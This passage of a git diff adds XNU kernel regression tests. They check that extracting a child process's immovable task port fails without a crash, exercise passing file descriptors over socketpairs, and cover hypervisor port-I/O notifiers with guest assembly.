1000; i++) { + run_test(); + } +} diff --git a/tests/extract_right_soft_fail.c b/tests/extract_right_soft_fail.c new file mode 100644 index 000000000..006512ae4 --- /dev/null +++ b/tests/extract_right_soft_fail.c @@ -0,0 +1,114 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IKOT_TASK_CONTROL 2 + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +static void +test_extract_immovable_task_port(pid_t pid) +{ + kern_return_t kr; + mach_port_t tport = MACH_PORT_NULL; + ipc_info_space_t space_info; + ipc_info_name_array_t table; + mach_msg_type_number_t tableCount; + ipc_info_tree_name_array_t tree; /* unused */ + mach_msg_type_number_t treeCount; /* unused */ + + mach_port_t extracted; + mach_msg_type_name_t right; + + + kr = task_for_pid(mach_task_self(), pid, &tport); + T_EXPECT_MACH_SUCCESS(kr, "task_for_pid(), tport: 0x%x", tport); + + T_LOG("Target pid: %d", pid); + + if (pid == getpid()) { + /* self 
extraction should succeed */ + kr = mach_port_extract_right(mach_task_self(), mach_task_self(), MACH_MSG_TYPE_COPY_SEND, &extracted, &right); + T_EXPECT_MACH_SUCCESS(kr, "mach_port_extract_right() on immovable port in current space should succeed"); + } else { + unsigned int kotype = 0, kobject = 0; + mach_port_name_t tport_name = MACH_PORT_NULL; + kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount); + T_EXPECT_MACH_SUCCESS(kr, "mach_port_space_info()"); + + for (int i = 0; i < tableCount; i++) { + T_LOG("Searching for task port..name: 0x%x", table[i].iin_name); + kr = mach_port_kernel_object(tport, table[i].iin_name, &kotype, &kobject); + if (KERN_SUCCESS == kr && kotype == IKOT_TASK_CONTROL) { + tport_name = table[i].iin_name; + break; + } else if (kr) { + T_LOG("mach_port_kernel_object() failed on name 0x%x, kr: 0x%x", table[i].iin_name, kr); + } + } + + if (!tport_name) { + T_FAIL("Did not find task port in child's space"); + } + T_LOG("Remote tport name: 0x%x", tport_name); + kr = mach_port_extract_right(tport, tport_name, MACH_MSG_TYPE_COPY_SEND, &extracted, &right); + T_EXPECT_EQ(kr, KERN_INVALID_CAPABILITY, "mach_port_extract_right() on immovable port in child's space should fail (no crash): 0x%x", kr); + + T_LOG("Still alive.."); + } +} + +T_DECL(extract_right_soft_fail, "Test mach_port_extract_right() fail on extracting child process's task port without crash", + T_META_CHECK_LEAKS(false)) +{ + uint32_t opts = 0; + size_t size = sizeof(opts); + pid_t child_pid; + kern_return_t ret; + int status, fd[2]; + + T_LOG("Check if immovable control port has been enabled\n"); + ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + + if (!ret && (opts & 0x20) == 0) { + T_SKIP("immovable control port hard enforcement isn't enabled"); + } + + /* extracting mach_task_self() should succeed */ + test_extract_immovable_task_port(getpid()); + + ret = pipe(fd); + T_EXPECT_NE(ret, -1, "pipe creation"); + +
child_pid = fork(); + + if (child_pid < 0) { + T_FAIL("fork failed()"); + } + + if (child_pid == 0) { + close(fd[0]); + write(fd[1], "wakeup", 6); + close(fd[1]); + } else { + close(fd[1]); + char data[6]; + read(fd[0], data, 6); /* blocks until data available */ + close(fd[0]); + + /* extracting child's immovable task port should fail without crash */ + test_extract_immovable_task_port(child_pid); + + kill(child_pid, SIGKILL); + wait(&status); + } +} diff --git a/tests/fd_send.c b/tests/fd_send.c new file mode 100644 index 000000000..53aa3687c --- /dev/null +++ b/tests/fd_send.c @@ -0,0 +1,207 @@ +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.fd"), + T_META_RUN_CONCURRENTLY(true)); + + +#define SOCKETPAIR(pair) \ + T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), "socketpair") + + +static errno_t +send_fd(int sock, int fd) +{ + struct iovec iovec[1]; + struct msghdr msg; + struct cmsghdr *cmsghdrp; + char buf[CMSG_SPACE(sizeof(int))]; + + iovec[0].iov_base = ""; + iovec[0].iov_len = 1; + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_iov = iovec; + msg.msg_iovlen = 1; + msg.msg_control = buf; + msg.msg_controllen = CMSG_SPACE(sizeof(int)); + + cmsghdrp = CMSG_FIRSTHDR(&msg); + cmsghdrp->cmsg_len = CMSG_LEN(sizeof(int)); + cmsghdrp->cmsg_level = SOL_SOCKET; + cmsghdrp->cmsg_type = SCM_RIGHTS; + + memcpy(CMSG_DATA(cmsghdrp), &fd, sizeof(fd)); + + if (sendmsg(sock, &msg, 0) < 0) { + return errno; + } + + return 0; +} + +static errno_t +recv_fd(int sock, int *fdp) +{ + u_char c; + struct iovec iovec[1]; + struct msghdr msg; + struct cmsghdr *cmsghdrp; + char buf[CMSG_SPACE(sizeof(int))]; + + iovec[0].iov_base = &c; + iovec[0].iov_len = 1; + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_iov = iovec; + msg.msg_iovlen = 1; + msg.msg_control = buf; + msg.msg_controllen = CMSG_SPACE(sizeof(int)); + msg.msg_flags = 0; + + if (recvmsg(sock, &msg, 0) < 0) { + return errno; + } + + cmsghdrp = 
CMSG_FIRSTHDR(&msg); + if (cmsghdrp == NULL) { + return ENOENT; + } + + if (cmsghdrp->cmsg_len != CMSG_LEN(sizeof(int))) { + return ENOENT; + } + if (cmsghdrp->cmsg_level != SOL_SOCKET) { + return ENOENT; + } + if (cmsghdrp->cmsg_type != SCM_RIGHTS) { + return ENOENT; + } + + memcpy(fdp, CMSG_DATA(cmsghdrp), sizeof(*fdp)); + return 0; +} + +T_DECL(send, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), + "socketpair"); + + child = fork(); + if (child != 0) { + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +T_DECL(send_kill, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_QUIET; SOCKETPAIR(pair); + + child = fork(); + if (child != 0) { + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)"); + + T_EXPECT_POSIX_SUCCESS(kill(child, SIGKILL), "kill(child)"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +T_DECL(send_sock, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_QUIET; SOCKETPAIR(pair); + + child = fork(); + if (child != 0) { + int sock[2]; + + T_QUIET; SOCKETPAIR(sock); + + 
T_ASSERT_EQ(send_fd(pair[0], sock[0]), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(sock[0]), "close(sock[0])"); + T_ASSERT_POSIX_SUCCESS(close(sock[1]), "close(sock[1])"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +/* Ten concurrent workers each pass 1000 dup()ed /dev/null descriptors over their own socketpair to a receiver block running on a private queue. */ +T_DECL(send_stress, "test for 67133384") +{ + int fd; + + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + dispatch_apply(10, NULL, ^(size_t worker) { + dispatch_queue_t q = dispatch_queue_create("receiver", NULL); + dispatch_group_t g = dispatch_group_create(); + int pairbuf[2], *pair = pairbuf; + int n = 1000; + + SOCKETPAIR(pair); + + dispatch_group_async(g, q, ^{ + int tmp; + + for (int i = 0; i < n; i++) { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &tmp), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(tmp, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)"); + } + }); + dispatch_release(q); + + for (int i = 0; i < n; i++) { + int tmp = dup(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(tmp, "dup"); + T_QUIET; T_ASSERT_EQ(send_fd(pair[0], tmp), 0, "send_fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)"); + } + dispatch_group_wait(g, DISPATCH_TIME_FOREVER); + dispatch_release(g); /* the receiver block has finished; drop the group created above */ + + T_PASS("sent and received %d fds in worker %zu", n, worker); + + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[0]), "close(pair[0])"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[1]), "close(pair[1])"); + }); +} diff --git a/tests/fp_exception.c b/tests/fp_exception.c index 12f09d0e8..aaf0610b9 100644 --- a/tests/fp_exception.c +++ b/tests/fp_exception.c @@ -54,6 +54,8 @@ static volatile bool mach_exc_caught = false; #ifdef __arm64__ static size_t exc_arithmetic_handler( + __unused mach_port_t task, + __unused mach_port_t thread, exception_type_t type, 
mach_exception_data_t codes_64) { diff --git a/tests/hv_private.entitlements b/tests/hv_private.entitlements deleted file mode 100644 index e6cea6583..000000000 --- a/tests/hv_private.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.private.hypervisor - - - diff --git a/tests/hv_public.entitlements b/tests/hv_public.entitlements deleted file mode 100644 index c2ef1a38b..000000000 --- a/tests/hv_public.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.security.hypervisor - - - diff --git a/tests/hvtest_x86.m b/tests/hvtest_x86.m index 0aebb6bc1..65e885e43 100644 --- a/tests/hvtest_x86.m +++ b/tests/hvtest_x86.m @@ -569,8 +569,11 @@ vm_setup() static void vm_cleanup() { - T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm"); + T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm"); free_page_cache(); + + pml4 = NULL; + pml4_gpa = 0; } static pthread_cond_t ready_cond = PTHREAD_COND_INITIALIZER; @@ -1246,3 +1249,392 @@ T_DECL(radar63641279, "rdar://63641279 (Evaluate \"no SMT\" scheduling option/si vm_cleanup(); } + +// Get the number of messages waiting for the specified port +/* Drains the port with zero-timeout receives, asserting on each message's addr, value and size, and stops at the first receive that does not succeed. */ +static int +get_count(mach_port_t port) +{ + int count; + + count = 0; + while (true) { + hv_ion_message_t msg = { + .header.msgh_size = sizeof (msg), + .header.msgh_local_port = port, + }; + + kern_return_t ret = mach_msg(&msg.header, MACH_RCV_MSG | MACH_RCV_TIMEOUT, + 0, sizeof (msg), port, 0, MACH_PORT_NULL); + + if (ret != MACH_MSG_SUCCESS) { + break; + } + + T_QUIET; T_ASSERT_TRUE(msg.addr == 0xab || msg.addr == 0xcd || msg.addr == 0xef, + "address is 0xab, 0xcd or 0xef"); + T_QUIET; T_ASSERT_EQ(msg.value, 0xaaULL, "value written is 0xaa"); + T_QUIET; T_ASSERT_TRUE(msg.size == 1 || msg.size == 4, "size is 1 or 4"); + + count++; + } + + return count; +} + +/* VCPU monitor: maps a 1 MiB shadow buffer holding the guest code, runs the VCPU until a VMCALL exit, counts the port I/O exits it sees (each asserted to be on port 0xef) and stores that count in *(int *)arg. */ +static void * +pio_monitor(void *arg, hv_vcpuid_t vcpu) +{ + + size_t guest_pages_size = round_page((uintptr_t)&hvtest_end - (uintptr_t)&hvtest_begin); + const size_t mem_size = 1 * 1024 * 1024; + uint8_t 
*guest_pages_shadow = valloc(mem_size); + int handle_io_count = 0; + uint64_t exit_reason = 0; + + setup_real_mode(vcpu); + + bzero(guest_pages_shadow, mem_size); + memcpy(guest_pages_shadow+0x1000, &hvtest_begin, guest_pages_size); + + T_ASSERT_EQ(hv_vm_map(guest_pages_shadow, 0x0, mem_size, HV_MEMORY_READ | HV_MEMORY_EXEC), HV_SUCCESS, + "map guest memory"); + + while (true) { + T_QUIET; T_ASSERT_EQ(hv_vcpu_run_until(vcpu, ~(uint64_t)0), HV_SUCCESS, "run VCPU"); + exit_reason = get_vmcs(vcpu, VMCS_RO_EXIT_REASON); + + if (exit_reason == VMX_REASON_VMCALL) { + break; + } + + if (exit_reason == VMX_REASON_IRQ) { + continue; + } + + T_QUIET; T_ASSERT_EQ(exit_reason, (uint64_t)VMX_REASON_IO, "exit reason is IO"); + + union { + struct { + uint64_t io_size:3; + uint64_t io_dirn:1; + uint64_t io_string:1; + uint64_t io_rep:1; + uint64_t io_encoding:1; + uint64_t __io_resvd0:9; + uint64_t io_port:16; + uint64_t __io_resvd1:32; + } io; + uint64_t reg64; + } info = { + .reg64 = get_vmcs(vcpu, VMCS_RO_EXIT_QUALIFIC), + }; + + T_QUIET; T_ASSERT_EQ(info.io.io_port, 0xefULL, "exit is a port IO on 0xef"); + + handle_io_count++; + + /* skip the I/O instruction that caused the exit */ + set_vmcs(vcpu, VMCS_GUEST_RIP, get_reg(vcpu, HV_X86_RIP) + get_vmcs(vcpu, VMCS_RO_VMEXIT_INSTR_LEN)); + } + + free(guest_pages_shadow); + + *((int *)arg) = handle_io_count; + + return NULL; +} + +/* Exercises argument checking of hv_vm_add_pio_notifier()/hv_vm_remove_pio_notifier(): invalid size, data, port and flags, duplicates, and add/remove pairs. */ +T_DECL(pio_notifier_arguments, "test adding and removing port IO notifiers") +{ + mach_port_t notify_port = MACH_PORT_NULL; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + T_SETUPBEGIN; + + /* Setup notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + &notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* Setup VM */ + vm_setup(); + + T_SETUPEND; + + /* Add with bad size. 
*/ + hret = hv_vm_add_pio_notifier(0xab, 7, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad size"); + + /* Add with bad data. */ + hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad data"); + + /* Add with bad mach port. */ + /* NOTE(review): this call also passes UINT16_MAX as the data argument, exactly like the bad-data case above, so a failure here cannot be attributed to the port alone - confirm whether a valid value such as 1 was intended. */ + hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, MACH_PORT_NULL, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad port"); + + /* Add with bad flags. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, 0xffff); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad flags"); + + /* Remove when none are installed. */ + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "removing a non-existent notifier"); + + /* Add duplicate. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier"); + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding duplicate notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier"); + + /* Add then remove. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier"); + + /* Add two, remove in reverse order. 
*/ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 1st notifier"); + hret = hv_vm_add_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 2nd notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing 2nd notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier in reverse order"); + + /* Add with ANY_SIZE and remove. */ + hret = hv_vm_add_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_SIZE"); + hret = hv_vm_remove_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_SIZE"); + + /* Add with ANY_VALUE and remove. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_VALUE"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_VALUE"); + + vm_cleanup(); + + mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1); +} + +/* Runs the pio_entry_basic guest three times, each time invalidating the notification port in a different way (destroy, drop the receive right, deallocate) after the notifier has been installed. */ +T_DECL(pio_notifier_bad_port, "test port IO notifiers when the port is destroyed/deallocated/has no receive right") +{ + pthread_t vcpu_thread; + mach_port_t notify_port = MACH_PORT_NULL; + int handle_io_count = 0; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + /* Setup VM */ + vm_setup(); + + /* + * Test that nothing bad happens when the notification port is + * added and mach_port_destroy() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + &notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. 
*/ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, destroy the port. */ + kret = mach_port_destroy(mach_task_self(), notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect the messages to be lost. */ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port destroyed"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); + + + vm_setup(); + /* + * Test that nothing bad happens when the notification port is added and + * mach_port_mod_refs() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + &notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. */ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, remove receive right. 
*/ + /* store the result so the assertion below checks this call, not the earlier insert_right */ + kret = mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "removing receive right"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be lost. */ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when receive right removed"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); + + + vm_setup(); + /* + * Test that nothing bad happens when the notification port is added and + * mach_port_deallocate() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + &notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. */ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, call mach_port_deallocate(). */ + kret = mach_port_deallocate(mach_task_self(), notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "deallocating notify port"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be lost. 
*/ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port deallocated"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); +} + +/* Installs four notifiers with different port/size/value/flag combinations, runs the pio_entry guest, then checks how many messages were queued on each notification port. */ +T_DECL(pio_notifier, "test port IO notifiers") +{ + #define MACH_PORT_COUNT 4 + mach_port_t notify_port[MACH_PORT_COUNT] = { MACH_PORT_NULL }; + int handle_io_count = 0; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + T_SETUPBEGIN; + + /* Setup notification ports. */ + for (int i = 0; i < MACH_PORT_COUNT; i++) { + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + &notify_port[i]); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + kret = mach_port_insert_right(mach_task_self(), notify_port[i], notify_port[i], + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + } + /* Setup VM */ + vm_setup(); + + T_SETUPEND; + + /* Test that messages are properly sent to mach port notifiers. */ + + /* One for all port writes to 0xab. */ + hret = hv_vm_add_pio_notifier(0xab, 0, 0, notify_port[0], + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xab"); + + /* One for 4 byte writes of 0xaa. */ + hret = hv_vm_add_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for 4 byte writes " + "to port 0xab"); + + /* One for all writes to 0xcd (ignoring queue full errors). */ + hret = hv_vm_add_pio_notifier(0xcd, 0, 0, notify_port[2], + HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xcd, ignoring if the queue fills"); + + /* One for writes to 0xef asking for exits when the queue is full. 
*/ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port[3], + HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef, not ignoring if the queue fills"); + + /* Run the pio_entry guest code; pio_monitor stores the number of port I/O exits it handled in handle_io_count. */ + pthread_t vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be waiting. */ + T_ASSERT_EQ(4, get_count(notify_port[0]), "expected 4 messages"); + T_ASSERT_EQ(1, get_count(notify_port[1]), "expected 1 messages"); + T_ASSERT_EQ(10, get_count(notify_port[2]) + handle_io_count, "expected IO exits"); + T_ASSERT_EQ(5, get_count(notify_port[3]), "expected 5 messages"); + + /* Remove each notifier with the same arguments it was added with. */ + hret = hv_vm_remove_pio_notifier(0xab, 0, 0, notify_port[0], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xab"); + + hret = hv_vm_remove_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for 4 byte writes " + "to port 0xab"); + + hret = hv_vm_remove_pio_notifier(0xcd, 0, 0, notify_port[2], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes " + "to port 0xcd, ignoring if the queue fills"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port[3], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes " + "to port 0xef, not ignoring if the queue fills"); + + vm_cleanup(); + + for (int i = 0; i < MACH_PORT_COUNT; i++) { + mach_port_mod_refs(mach_task_self(), notify_port[i], MACH_PORT_RIGHT_RECEIVE, -1); + } +} diff --git a/tests/hvtest_x86_asm.s b/tests/hvtest_x86_asm.s index c2783f5c5..461b1dbc4 100644 --- a/tests/hvtest_x86_asm.s +++ b/tests/hvtest_x86_asm.s @@ -482,5 +482,42 @@ 
_radar60691363_entry: vmcall +.code16 + + // Perform a fixed number of port I/Os with various arguments. + .global _pio_entry +_pio_entry: + + movl $0xaa, %eax + + outl %eax, $0xab + + movl $3, %ecx +1: outb %al, $0xab + loop 1b + + movl $10, %ecx +1: outb %al, $0xcd + loop 1b + + movl $10, %ecx +1: outb %al, $0xef + loop 1b + + movl $0x23456, %eax + vmcall + +.code16 + // Perform 10 port I/Os on 0xef. + .global _pio_entry_basic +_pio_entry_basic: + + movl $10, %ecx +1: outb %al, $0xef + loop 1b + + movl $0x23456, %eax + vmcall + .global _hvtest_end _hvtest_end: diff --git a/tests/hvtest_x86_guest.h b/tests/hvtest_x86_guest.h index 5cb41f34c..df15339ce 100644 --- a/tests/hvtest_x86_guest.h +++ b/tests/hvtest_x86_guest.h @@ -13,6 +13,8 @@ extern void radar61961809_entry(uint64_t) OS_NORETURN; extern void radar61961809_prepare(uint64_t) OS_NORETURN; extern void radar61961809_loop64(uint64_t) OS_NORETURN; extern void radar60691363_entry(uint64_t) OS_NORETURN; +extern void pio_entry(uint64_t) OS_NORETURN; +extern void pio_entry_basic(uint64_t) OS_NORETURN; #define MSR_IA32_STAR 0xc0000081 #define MSR_IA32_LSTAR 0xc0000082 diff --git a/tests/imm_pinned_control_port.c b/tests/imm_pinned_control_port.c new file mode 100644 index 000000000..441cdba62 --- /dev/null +++ b/tests/imm_pinned_control_port.c @@ -0,0 +1,370 @@ +#include +#include +#include 